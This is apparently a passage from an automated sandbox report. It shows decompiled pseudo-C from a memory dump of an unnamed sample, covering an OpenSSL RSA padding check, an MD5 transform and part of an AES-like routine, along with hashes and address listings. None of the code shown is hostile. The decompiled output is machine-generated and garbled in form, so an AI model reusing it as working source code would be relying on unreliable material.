						_t84 = _a28;
						if(_t51 > _t84 || _t84 < 0xb) {
							L12:
							_push(0xf0);
							_push("crypto\\rsa\\rsa_pk1.c");
							E00BA3490(_t82);
							_t102 = _t100 + 0xc;
							if(_t95 == 0xffffffff) {
								E00B98310(_t82, 4, 0x71, 0x9f, "crypto\\rsa\\rsa_pk1.c", 0xf3);
								_t102 = _t102 + 0x14;
							}
							return _t95;
						} else {
							_t82 = E00BA3430(_t51, _t84, "crypto\\rsa\\rsa_pk1.c", 0xb2);
							_t104 = _t100 + 0xc;
							if(_t82 != 0) {
								E00C6B7A0(_t51, _t82, _t84, _t82 - _t51 + _t84, _a20, _t51);
								_t56 =  ~((_t82[1] & 0x000000ff ^ 0x00000002) - 0x00000001 >> 0x0000001f &  !(_t82[1] & 0x000000ff ^ 0x00000002) >> 0x0000001f) &  ~(( *_t82 & 0x000000ff) - 0x00000001 >> 0x0000001f &  !( *_t82 & 0x000000ff) >> 0x0000001f);
								_t73 = 2;
								_t100 = _t104 + 0xc;
								_v0 = 0;
								if(_t84 > 2) {
									do {
										_t68 =  ~((_t82[_t73] & 0x000000ff) - 0x00000001 >> 0x0000001f &  !(_t82[_t73] & 0x000000ff) >> 0x0000001f);
										_v0 = _v0 | _t68;
										_t99 =  !( !_v0 & _t68) & _a4 |  !_v0 & _t68 & _t73;
										_t73 = _t73 + 1;
										_a4 = _t99;
									} while (_t73 < _t84);
								}
								_t39 = _a4;
								_t63 = _t39 + 1;
								_t86 = _t84 - _t39 + 1;
								_t95 = _t86;
								_t92 = (((_t39 - 0x0000000a | _t39) ^ _t39) >> 0x1f) - 1;
								if((_t56 & (((_a16 - _t95 ^ _t95 | _t86 ^ _a16) ^ _a16) >> 0x0000001f) - 0x00000001 & (((_t39 - 0x0000000a | _t39) ^ _t39) >> 0x0000001f) - 0x00000001) != 0) {
									E00C6B7A0(_t56, _t82, _t92, _a12, _t63 + _t82, _t95);
									_t100 = _t100 + 0xc;
								} else {
									_t95 = _t95 | 0xffffffff;
								}
								goto L12;
							} else {
								return E00B98310(_t82, 4, 0x71, 0x41, "crypto\\rsa\\rsa_pk1.c", 0xb4) | _t95;
							}
						}
					}
				}
			}





















                                                              0x00bb9655
                                                              0x00bb965d
                                                              0x00bb965f
                                                              0x00bb9666
                                                              0x00bb966a
                                                              0x00bb97db
                                                              0x00bb97e2
                                                              0x00bb9670
                                                              0x00bb9670
                                                              0x00bb9676
                                                              0x00000000
                                                              0x00bb967c
                                                              0x00bb967d
                                                              0x00bb9683
                                                              0x00bb979c
                                                              0x00bb979c
                                                              0x00bb97a1
                                                              0x00bb97a7
                                                              0x00bb97ac
                                                              0x00bb97b2
                                                              0x00bb97c7
                                                              0x00bb97cc
                                                              0x00bb97cc
                                                              0x00bb97d8
                                                              0x00bb9692
                                                              0x00bb96a2
                                                              0x00bb96a4
                                                              0x00bb96a9
                                                              0x00bb96da
                                                              0x00bb9707
                                                              0x00bb9709
                                                              0x00bb970e
                                                              0x00bb9713
                                                              0x00bb971b
                                                              0x00bb9720
                                                              0x00bb9735
                                                              0x00bb9737
                                                              0x00bb9749
                                                              0x00bb974b
                                                              0x00bb974e
                                                              0x00bb974e
                                                              0x00bb9720
                                                              0x00bb9754
                                                              0x00bb975c
                                                              0x00bb975f
                                                              0x00bb9761
                                                              0x00bb977f
                                                              0x00bb9784
                                                              0x00bb9794
                                                              0x00bb9799
                                                              0x00bb9786
                                                              0x00bb9786
                                                              0x00bb9786
                                                              0x00000000
                                                              0x00bb96ab
                                                              0x00bb96cc
                                                              0x00bb96cc
                                                              0x00bb96a9
                                                              0x00bb9683
                                                              0x00bb9676

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: crypto\rsa\rsa_pk1.c
                                                              • API String ID: 2102423945-3200250649
                                                              • Opcode ID: ff6f062792b9857f121d321d0493d8e8d432ed12b300c11c597bf4ae40bc62d3
                                                              • Instruction ID: 110b8beda354fdb78abee67683d5aa3cd8f74111b4540eccddbf25b368fcaca8
                                                              • Opcode Fuzzy Hash: ff6f062792b9857f121d321d0493d8e8d432ed12b300c11c597bf4ae40bc62d3
                                                              • Instruction Fuzzy Hash: DF419D32A543051BCB10DE69DC86A7BF3D1EBC0724F040768FA68D72C2DFB599099291
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BCA800, Relevance: .6, Instructions: 598COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 60%
                                                              			E00BCA800() {
				intOrPtr _t202;
				signed int _t205;
				signed int _t208;
				signed int _t211;
				signed int _t214;
				signed int _t217;
				signed int _t220;
				signed int _t223;
				signed int _t226;
				signed int _t229;
				signed int _t232;
				signed int _t235;
				signed int _t238;
				signed int _t241;
				signed int _t244;
				signed int _t247;
				signed int _t250;
				void* _t251;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t273;
				signed int _t276;
				signed int _t279;
				signed int _t282;
				signed int _t285;
				signed int _t288;
				signed int _t291;
				signed int _t294;
				signed int _t297;
				signed int _t305;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t317;
				signed int _t320;
				signed int _t323;
				signed int _t326;
				signed int _t329;
				signed int _t332;
				signed int _t335;
				signed int _t338;
				signed int _t341;
				signed int _t344;
				signed int _t347;
				signed int _t350;
				signed int _t353;
				signed int _t354;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				signed int _t366;
				signed int _t369;
				signed int _t372;
				signed int _t375;
				signed int _t378;
				signed int _t381;
				signed int _t384;
				signed int _t387;
				signed int _t390;
				signed int _t393;
				signed int _t396;
				signed int _t399;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t649;
				intOrPtr* _t714;
				intOrPtr* _t715;

				_t403 =  *((intOrPtr*)(_t715 + 0xc));
				_t649 =  *((intOrPtr*)(_t715 + 0x10));
				_t202 =  *_t403;
				_push(( *(_t715 + 0x14) << 6) + _t649 - 0x40);
				_t252 =  *(_t403 + 4);
				_t305 =  *(_t403 + 8);
				_t354 =  *(_t403 + 0xc);
				do {
					_t9 = _t649 + 4; // 0xe3e85651
					asm("rol eax, 0x7");
					_t205 = _t202 +  *_t649 - 0x28955b88 + ((_t305 ^ _t354) & _t252 ^ _t354) + _t252;
					_t12 = _t649 + 8; // 0x8d0001c6
					asm("rol edx, 0xc");
					_t357 = _t354 +  *_t9 - 0x173848aa + ((_t252 ^ _t305) & _t205 ^ _t305) + _t205;
					_t15 = _t649 + 0xc; // 0x6a182454
					asm("rol ecx, 0x11");
					_t308 = _t305 +  *_t12 + 0x242070db + ((_t205 ^ _t252) & _t357 ^ _t252) + _t357;
					_t18 = _t649 + 0x10; // 0xc7e8525c
					asm("rol ebx, 0x16");
					_t255 = _t252 +  *_t15 - 0x3e423112 + ((_t357 ^ _t205) & _t308 ^ _t205) + _t308;
					_t21 = _t649 + 0x14; // 0x830000bf
					asm("rol eax, 0x7");
					_t208 = _t205 +  *_t18 - 0xa83f051 + ((_t308 ^ _t357) & _t255 ^ _t357) + _t255;
					_t24 = _t649 + 0x18; // 0xc68b1cc4
					asm("rol edx, 0xc");
					_t360 = _t357 +  *_t21 + 0x4787c62a + ((_t255 ^ _t308) & _t208 ^ _t308) + _t208;
					_t27 = _t649 + 0x1c; // 0x5cc4835e
					asm("rol ecx, 0x11");
					_t311 = _t308 +  *_t24 - 0x57cfb9ed + ((_t208 ^ _t255) & _t360 ^ _t255) + _t360;
					_t30 = _t649 + 0x20; // 0xccccccc3
					asm("rol ebx, 0x16");
					_t258 = _t255 +  *_t27 - 0x2b96aff + ((_t360 ^ _t208) & _t311 ^ _t208) + _t311;
					_t33 = _t649 + 0x24; // 0xcccccccc
					asm("rol eax, 0x7");
					_t211 = _t208 +  *_t30 + 0x698098d8 + ((_t311 ^ _t360) & _t258 ^ _t360) + _t258;
					_t36 = _t649 + 0x28; // 0xcccccccc
					asm("rol edx, 0xc");
					_t363 = _t360 +  *_t33 - 0x74bb0851 + ((_t258 ^ _t311) & _t211 ^ _t311) + _t211;
					_t39 = _t649 + 0x2c; // 0x448bcccc
					asm("rol ecx, 0x11");
					_t314 = _t311 +  *_t36 - 0xa44f + ((_t211 ^ _t258) & _t363 ^ _t258) + _t363;
					_t42 = _t649 + 0x30; // 0x8b0424
					asm("rol ebx, 0x16");
					_t261 = _t258 +  *_t39 - 0x76a32842 + ((_t363 ^ _t211) & _t314 ^ _t211) + _t314;
					_t45 = _t649 + 0x34; // 0xe9c1c88b
					asm("rol eax, 0x7");
					_t214 = _t211 +  *_t42 + 0x6b901122 + ((_t314 ^ _t363) & _t261 ^ _t363) + _t261;
					_t48 = _t649 + 0x38; // 0xc1c8330c
					asm("rol edx, 0xc");
					_t366 = _t363 +  *_t45 - 0x2678e6d + ((_t261 ^ _t314) & _t214 ^ _t314) + _t214;
					_t51 = _t649 + 0x3c; // 0xe1810ce9
					asm("rol ecx, 0x11");
					_t317 = _t314 +  *_t48 - 0x5986bc72 + ((_t214 ^ _t261) & _t366 ^ _t261) + _t366;
					_t54 = _t649 + 4; // 0xe3e85651
					asm("rol ebx, 0x16");
					_t264 = _t261 +  *_t51 + 0x49b40821 + ((_t366 ^ _t214) & _t317 ^ _t214) + _t317;
					_t57 = _t649 + 0x18; // 0xc68b1cc4
					asm("rol eax, 0x5");
					_t217 = _t214 +  *_t54 - 0x9e1da9e + ((_t317 ^ _t264) & _t366 ^ _t317) + _t264;
					_t60 = _t649 + 0x2c; // 0x448bcccc
					asm("rol edx, 0x9");
					_t369 = _t366 +  *_t57 - 0x3fbf4cc0 + ((_t264 ^ _t217) & _t317 ^ _t264) + _t217;
					asm("rol ecx, 0xe");
					_t320 = _t317 +  *_t60 + 0x265e5a51 + ((_t217 ^ _t369) & _t264 ^ _t217) + _t369;
					_t65 = _t649 + 0x14; // 0x830000bf
					asm("rol ebx, 0x14");
					_t267 = _t264 +  *_t649 - 0x16493856 + ((_t369 ^ _t320) & _t217 ^ _t369) + _t320;
					_t68 = _t649 + 0x28; // 0xcccccccc
					asm("rol eax, 0x5");
					_t220 = _t217 +  *_t65 - 0x29d0efa3 + ((_t320 ^ _t267) & _t369 ^ _t320) + _t267;
					_t71 = _t649 + 0x3c; // 0xe1810ce9
					asm("rol edx, 0x9");
					_t372 = _t369 +  *_t68 + 0x2441453 + ((_t267 ^ _t220) & _t320 ^ _t267) + _t220;
					_t74 = _t649 + 0x10; // 0xc7e8525c
					asm("rol ecx, 0xe");
					_t323 = _t320 +  *_t71 - 0x275e197f + ((_t220 ^ _t372) & _t267 ^ _t220) + _t372;
					_t77 = _t649 + 0x24; // 0xcccccccc
					asm("rol ebx, 0x14");
					_t270 = _t267 +  *_t74 - 0x182c0438 + ((_t372 ^ _t323) & _t220 ^ _t372) + _t323;
					_t80 = _t649 + 0x38; // 0xc1c8330c
					asm("rol eax, 0x5");
					_t223 = _t220 +  *_t77 + 0x21e1cde6 + ((_t323 ^ _t270) & _t372 ^ _t323) + _t270;
					_t83 = _t649 + 0xc; // 0x6a182454
					asm("rol edx, 0x9");
					_t375 = _t372 +  *_t80 - 0x3cc8f82a + ((_t270 ^ _t223) & _t323 ^ _t270) + _t223;
					_t86 = _t649 + 0x20; // 0xccccccc3
					asm("rol ecx, 0xe");
					_t326 = _t323 +  *_t83 - 0xb2af279 + ((_t223 ^ _t375) & _t270 ^ _t223) + _t375;
					_t89 = _t649 + 0x34; // 0xe9c1c88b
					asm("rol ebx, 0x14");
					_t273 = _t270 +  *_t86 + 0x455a14ed + ((_t375 ^ _t326) & _t223 ^ _t375) + _t326;
					_t92 = _t649 + 8; // 0x8d0001c6
					asm("rol eax, 0x5");
					_t226 = _t223 +  *_t89 - 0x561c16fb + ((_t326 ^ _t273) & _t375 ^ _t326) + _t273;
					_t95 = _t649 + 0x1c; // 0x5cc4835e
					asm("rol edx, 0x9");
					_t378 = _t375 +  *_t92 - 0x3105c08 + ((_t273 ^ _t226) & _t326 ^ _t273) + _t226;
					_t98 = _t649 + 0x30; // 0x8b0424
					asm("rol ecx, 0xe");
					_t329 = _t326 +  *_t95 + 0x676f02d9 + ((_t226 ^ _t378) & _t273 ^ _t226) + _t378;
					_t101 = _t649 + 0x14; // 0x830000bf
					asm("rol ebx, 0x14");
					_t276 = _t273 +  *_t98 - 0x72d5b376 + ((_t378 ^ _t329) & _t226 ^ _t378) + _t329;
					_t104 = _t649 + 0x20; // 0xccccccc3
					asm("rol eax, 0x4");
					_t229 = _t226 +  *_t101 - 0x5c6be + (_t329 ^ _t378 ^ _t276) + _t276;
					_t107 = _t649 + 0x2c; // 0x448bcccc
					asm("rol edx, 0xb");
					_t381 = _t378 +  *_t104 - 0x788e097f + (_t276 ^ _t329 ^ _t229) + _t229;
					_t110 = _t649 + 0x38; // 0xc1c8330c
					asm("rol ecx, 0x10");
					_t332 = _t329 +  *_t107 + 0x6d9d6122 + (_t229 ^ _t276 ^ _t381) + _t381;
					_t113 = _t649 + 4; // 0xe3e85651
					asm("rol ebx, 0x17");
					_t279 = _t276 +  *_t110 - 0x21ac7f4 + (_t381 ^ _t229 ^ _t332) + _t332;
					_t116 = _t649 + 0x10; // 0xc7e8525c
					asm("rol eax, 0x4");
					_t232 = _t229 +  *_t113 - 0x5b4115bc + (_t332 ^ _t381 ^ _t279) + _t279;
					_t119 = _t649 + 0x1c; // 0x5cc4835e
					asm("rol edx, 0xb");
					_t384 = _t381 +  *_t116 + 0x4bdecfa9 + (_t279 ^ _t332 ^ _t232) + _t232;
					_t122 = _t649 + 0x28; // 0xcccccccc
					asm("rol ecx, 0x10");
					_t335 = _t332 +  *_t119 - 0x944b4a0 + (_t232 ^ _t279 ^ _t384) + _t384;
					_t125 = _t649 + 0x34; // 0xe9c1c88b
					asm("rol ebx, 0x17");
					_t282 = _t279 +  *_t122 - 0x41404390 + (_t384 ^ _t232 ^ _t335) + _t335;
					asm("rol eax, 0x4");
					_t235 = _t232 +  *_t125 + 0x289b7ec6 + (_t335 ^ _t384 ^ _t282) + _t282;
					_t130 = _t649 + 0xc; // 0x6a182454
					asm("rol edx, 0xb");
					_t387 = _t384 +  *_t649 - 0x155ed806 + (_t282 ^ _t335 ^ _t235) + _t235;
					_t133 = _t649 + 0x18; // 0xc68b1cc4
					asm("rol ecx, 0x10");
					_t338 = _t335 +  *_t130 - 0x2b10cf7b + (_t235 ^ _t282 ^ _t387) + _t387;
					_t136 = _t649 + 0x24; // 0xcccccccc
					asm("rol ebx, 0x17");
					_t285 = _t282 +  *_t133 + 0x4881d05 + (_t387 ^ _t235 ^ _t338) + _t338;
					_t139 = _t649 + 0x30; // 0x8b0424
					asm("rol eax, 0x4");
					_t238 = _t235 +  *_t136 - 0x262b2fc7 + (_t338 ^ _t387 ^ _t285) + _t285;
					_t142 = _t649 + 0x3c; // 0xe1810ce9
					asm("rol edx, 0xb");
					_t390 = _t387 +  *_t139 - 0x1924661b + (_t285 ^ _t338 ^ _t238) + _t238;
					_t145 = _t649 + 8; // 0x8d0001c6
					asm("rol ecx, 0x10");
					_t341 = _t338 +  *_t142 + 0x1fa27cf8 + (_t238 ^ _t285 ^ _t390) + _t390;
					asm("rol ebx, 0x17");
					_t288 = _t285 +  *_t145 - 0x3b53a99b + (_t390 ^ _t238 ^ _t341) + _t341;
					_t150 = _t649 + 0x1c; // 0x5cc4835e
					asm("rol eax, 0x6");
					_t241 = _t238 +  *_t649 - 0xbd6ddbc + ((0xffffffff ^ _t390 | _t288) ^ _t341) + _t288;
					_t153 = _t649 + 0x38; // 0xc1c8330c
					asm("rol edx, 0xa");
					_t393 = _t390 +  *_t150 + 0x432aff97 + ((0xffffffff ^ _t341 | _t241) ^ _t288) + _t241;
					_t156 = _t649 + 0x14; // 0x830000bf
					asm("rol ecx, 0xf");
					_t344 = _t341 +  *_t153 - 0x546bdc59 + ((0xffffffff ^ _t288 | _t393) ^ _t241) + _t393;
					_t159 = _t649 + 0x30; // 0x8b0424
					asm("rol ebx, 0x15");
					_t291 = _t288 +  *_t156 - 0x36c5fc7 + ((0xffffffff ^ _t241 | _t344) ^ _t393) + _t344;
					_t162 = _t649 + 0xc; // 0x6a182454
					asm("rol eax, 0x6");
					_t244 = _t241 +  *_t159 + 0x655b59c3 + ((0xffffffff ^ _t393 | _t291) ^ _t344) + _t291;
					_t165 = _t649 + 0x28; // 0xcccccccc
					asm("rol edx, 0xa");
					_t396 = _t393 +  *_t162 - 0x70f3336e + ((0xffffffff ^ _t344 | _t244) ^ _t291) + _t244;
					_t168 = _t649 + 4; // 0xe3e85651
					asm("rol ecx, 0xf");
					_t347 = _t344 +  *_t165 - 0x100b83 + ((0xffffffff ^ _t291 | _t396) ^ _t244) + _t396;
					_t171 = _t649 + 0x20; // 0xccccccc3
					asm("rol ebx, 0x15");
					_t294 = _t291 +  *_t168 - 0x7a7ba22f + ((0xffffffff ^ _t244 | _t347) ^ _t396) + _t347;
					_t174 = _t649 + 0x3c; // 0xe1810ce9
					asm("rol eax, 0x6");
					_t247 = _t244 +  *_t171 + 0x6fa87e4f + ((0xffffffff ^ _t396 | _t294) ^ _t347) + _t294;
					_t177 = _t649 + 0x18; // 0xc68b1cc4
					asm("rol edx, 0xa");
					_t399 = _t396 +  *_t174 - 0x1d31920 + ((0xffffffff ^ _t347 | _t247) ^ _t294) + _t247;
					_t180 = _t649 + 0x34; // 0xe9c1c88b
					asm("rol ecx, 0xf");
					_t350 = _t347 +  *_t177 - 0x5cfebcec + ((0xffffffff ^ _t294 | _t399) ^ _t247) + _t399;
					_t183 = _t649 + 0x10; // 0xc7e8525c
					asm("rol ebx, 0x15");
					_t297 = _t294 +  *_t180 + 0x4e0811a1 + ((0xffffffff ^ _t247 | _t350) ^ _t399) + _t350;
					_t186 = _t649 + 0x2c; // 0x448bcccc
					asm("rol eax, 0x6");
					_t250 = _t247 +  *_t183 - 0x8ac817e + ((0xffffffff ^ _t399 | _t297) ^ _t350) + _t297;
					_t189 = _t649 + 8; // 0x8d0001c6
					asm("rol edx, 0xa");
					_t402 = _t399 +  *_t186 - 0x42c50dcb + ((0xffffffff ^ _t350 | _t250) ^ _t297) + _t250;
					_t192 = _t649 + 0x24; // 0xcccccccc
					asm("rol ecx, 0xf");
					_t353 = _t350 +  *_t189 + 0x2ad7d2bb + ((0xffffffff ^ _t297 | _t402) ^ _t250) + _t402;
					_t714 =  *((intOrPtr*)(_t715 + 0x18));
					_t649 = _t649 + 0x40;
					asm("rol ebx, 0x15");
					_t202 = _t250 +  *_t714;
					_t252 = _t297 +  *_t192 - 0x14792c6f + ((0xffffffff ^ _t250 | _t353) ^ _t402) + _t353 +  *(_t714 + 4);
					_t305 = _t353 +  *(_t714 + 8);
					_t354 = _t402 +  *(_t714 + 0xc);
					 *_t714 = _t202;
					 *(_t714 + 4) = _t252;
					 *(_t714 + 8) = _t305;
					 *(_t714 + 0xc) = _t354;
				} while ( *_t715 >= _t649);
				_pop(_t251);
				return _t251;
			}











































































                                                              0x00bca802
                                                              0x00bca806
                                                              0x00bca818
                                                              0x00bca81a
                                                              0x00bca81b
                                                              0x00bca81e
                                                              0x00bca821
                                                              0x00bca824
                                                              0x00bca835
                                                              0x00bca83a
                                                              0x00bca83f
                                                              0x00bca84e
                                                              0x00bca853
                                                              0x00bca858
                                                              0x00bca867
                                                              0x00bca86c
                                                              0x00bca871
                                                              0x00bca880
                                                              0x00bca885
                                                              0x00bca88a
                                                              0x00bca899
                                                              0x00bca89e
                                                              0x00bca8a3
                                                              0x00bca8b2
                                                              0x00bca8b7
                                                              0x00bca8bc
                                                              0x00bca8cb
                                                              0x00bca8d0
                                                              0x00bca8d5
                                                              0x00bca8e4
                                                              0x00bca8e9
                                                              0x00bca8ee
                                                              0x00bca8fd
                                                              0x00bca902
                                                              0x00bca907
                                                              0x00bca916
                                                              0x00bca91b
                                                              0x00bca920
                                                              0x00bca92f
                                                              0x00bca934
                                                              0x00bca939
                                                              0x00bca948
                                                              0x00bca94d
                                                              0x00bca952
                                                              0x00bca961
                                                              0x00bca966
                                                              0x00bca96b
                                                              0x00bca97a
                                                              0x00bca97f
                                                              0x00bca984
                                                              0x00bca993
                                                              0x00bca998
                                                              0x00bca99d
                                                              0x00bca9ac
                                                              0x00bca9b1
                                                              0x00bca9b6
                                                              0x00bca9c5
                                                              0x00bca9cc
                                                              0x00bca9cf
                                                              0x00bca9de
                                                              0x00bca9e5
                                                              0x00bca9e8
                                                              0x00bca9fd
                                                              0x00bcaa00
                                                              0x00bcaa0f
                                                              0x00bcaa16
                                                              0x00bcaa19
                                                              0x00bcaa28
                                                              0x00bcaa2f
                                                              0x00bcaa32
                                                              0x00bcaa41
                                                              0x00bcaa48
                                                              0x00bcaa4b
                                                              0x00bcaa5a
                                                              0x00bcaa61
                                                              0x00bcaa64
                                                              0x00bcaa73
                                                              0x00bcaa7a
                                                              0x00bcaa7d
                                                              0x00bcaa8c
                                                              0x00bcaa93
                                                              0x00bcaa96
                                                              0x00bcaaa5
                                                              0x00bcaaac
                                                              0x00bcaaaf
                                                              0x00bcaabe
                                                              0x00bcaac5
                                                              0x00bcaac8
                                                              0x00bcaad7
                                                              0x00bcaade
                                                              0x00bcaae1
                                                              0x00bcaaf0
                                                              0x00bcaaf7
                                                              0x00bcaafa
                                                              0x00bcab09
                                                              0x00bcab10
                                                              0x00bcab13
                                                              0x00bcab22
                                                              0x00bcab29
                                                              0x00bcab2c
                                                              0x00bcab3b
                                                              0x00bcab42
                                                              0x00bcab45
                                                              0x00bcab54
                                                              0x00bcab57
                                                              0x00bcab5c
                                                              0x00bcab69
                                                              0x00bcab70
                                                              0x00bcab73
                                                              0x00bcab82
                                                              0x00bcab85
                                                              0x00bcab8a
                                                              0x00bcab97
                                                              0x00bcab9e
                                                              0x00bcaba1
                                                              0x00bcabb0
                                                              0x00bcabb3
                                                              0x00bcabb8
                                                              0x00bcabc5
                                                              0x00bcabcc
                                                              0x00bcabcf
                                                              0x00bcabde
                                                              0x00bcabe1
                                                              0x00bcabe6
                                                              0x00bcabf3
                                                              0x00bcabfa
                                                              0x00bcabfd
                                                              0x00bcac0e
                                                              0x00bcac13
                                                              0x00bcac20
                                                              0x00bcac27
                                                              0x00bcac2a
                                                              0x00bcac39
                                                              0x00bcac3c
                                                              0x00bcac41
                                                              0x00bcac4e
                                                              0x00bcac55
                                                              0x00bcac58
                                                              0x00bcac67
                                                              0x00bcac6a
                                                              0x00bcac6f
                                                              0x00bcac7c
                                                              0x00bcac83
                                                              0x00bcac86
                                                              0x00bcac95
                                                              0x00bcac98
                                                              0x00bcac9d
                                                              0x00bcacb3
                                                              0x00bcacb6
                                                              0x00bcacc5
                                                              0x00bcaccf
                                                              0x00bcacd4
                                                              0x00bcace1
                                                              0x00bcaceb
                                                              0x00bcacf0
                                                              0x00bcacfd
                                                              0x00bcad07
                                                              0x00bcad0c
                                                              0x00bcad19
                                                              0x00bcad23
                                                              0x00bcad28
                                                              0x00bcad35
                                                              0x00bcad3f
                                                              0x00bcad44
                                                              0x00bcad51
                                                              0x00bcad5b
                                                              0x00bcad60
                                                              0x00bcad6d
                                                              0x00bcad77
                                                              0x00bcad7c
                                                              0x00bcad89
                                                              0x00bcad93
                                                              0x00bcad98
                                                              0x00bcada5
                                                              0x00bcadaf
                                                              0x00bcadb4
                                                              0x00bcadc1
                                                              0x00bcadcb
                                                              0x00bcadd0
                                                              0x00bcaddd
                                                              0x00bcade7
                                                              0x00bcadec
                                                              0x00bcadf9
                                                              0x00bcae03
                                                              0x00bcae08
                                                              0x00bcae15
                                                              0x00bcae1f
                                                              0x00bcae24
                                                              0x00bcae31
                                                              0x00bcae3b
                                                              0x00bcae40
                                                              0x00bcae4d
                                                              0x00bcae57
                                                              0x00bcae5c
                                                              0x00bcae69
                                                              0x00bcae6f
                                                              0x00bcae72
                                                              0x00bcae7a
                                                              0x00bcae7f
                                                              0x00bcae84
                                                              0x00bcae89
                                                              0x00bcae8b
                                                              0x00bcae8e
                                                              0x00bcae94
                                                              0x00bcae97
                                                              0x00bcae9a
                                                              0x00bcaea2
                                                              0x00bcaea7

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction ID: 50a9c66cfb270d1dc5c4dbf5649b389f0a03cebf8e8f2e3f5cdc5091b06c5a8d
                                                              • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction Fuzzy Hash: 172264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA0E86, Relevance: .5, Instructions: 511COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 76%
                                                              			E00BA0E86(int __ecx) {
				void* _t249;
				signed int _t251;
				signed int _t252;
				void* _t254;
				signed int _t255;
				void* _t257;
				void* _t258;
				signed int _t261;
				void* _t264;
				signed int _t266;
				signed int _t271;
				void* _t273;
				signed int _t276;
				void* _t278;
				void* _t288;
				signed int _t289;
				signed int _t290;
				void* _t295;
				signed int _t300;
				signed int _t301;
				signed int _t305;
				signed int _t309;
				signed int _t311;
				signed int _t315;
				signed int _t318;
				int _t320;
				signed int _t321;
				signed int _t322;
				int _t328;
				int _t329;
				signed int _t334;
				signed int _t342;
				int _t346;
				signed int _t349;
				int _t352;
				signed int _t355;
				int _t357;
				void** _t361;
				signed int _t363;
				signed int _t364;
				void* _t367;
				signed int _t369;
				signed int _t372;
				signed int** _t376;
				signed int* _t377;
				signed int _t378;
				signed int _t381;
				signed int _t385;
				intOrPtr _t389;
				void* _t390;
				void* _t391;
				signed int* _t393;
				void* _t406;
				void* _t407;
				void* _t415;
				void* _t416;
				int _t419;
				void** _t420;
				signed int* _t421;
				void** _t423;
				void* _t424;
				signed int* _t428;
				signed int* _t429;
				void** _t431;
				void* _t433;
				void* _t438;
				void* _t440;
				void* _t441;
				int _t443;
				signed int* _t444;
				void* _t445;
				void* _t448;
				signed int* _t450;
				void* _t453;
				void* _t459;
				signed int _t465;
				signed int _t466;
				void* _t469;
				signed int* _t471;
				signed int* _t472;
				void** _t474;
				void** _t478;
				void** _t479;
				void** _t481;
				void* _t484;
				signed int _t485;
				void* _t493;
				intOrPtr _t496;
				void* _t498;
				void* _t508;
				signed int _t513;

				_t320 = __ecx;
				_pop(_t484);
				_t2 = _t484 - 0x2346; // 0xa56363c6
				_t485 = _t2;
				if( *((intOrPtr*)(_t496 + 0x28)) == 0) {
					_t485 = _t485 + 0x1680;
				}
				asm("pushfd");
				asm("cld");
				if(_t320 < 0x200) {
					L30:
					_t389 =  *((intOrPtr*)(_t496 + 0x24));
					_t438 = (_t496 - 0x00000050 & 0xffffffc0) - ( ~(_t389 - 0x8f - (_t496 - 0x00000050 & 0xffffffc0)) & 0x000003c0);
					_t361 = _t496 + 0x18;
					_t498 = _t438 + 4;
					 *((intOrPtr*)(_t498 + 0x18)) = _t485 + (_t438 + 0x00000300 - _t485 & 0x00000300) + 0x880;
					 *((intOrPtr*)(_t498 + 0x1c)) = _t496;
					 *((intOrPtr*)(_t498 + 0x34)) =  *0xecc790;
					_t249 =  *_t361;
					_t288 = _t361[1];
					_t440 = _t361[4];
					 *(_t498 + 0x20) = _t249;
					 *(_t498 + 0x24) = _t288;
					 *(_t498 + 0x28) = _t320;
					 *((intOrPtr*)(_t498 + 0x2c)) = _t389;
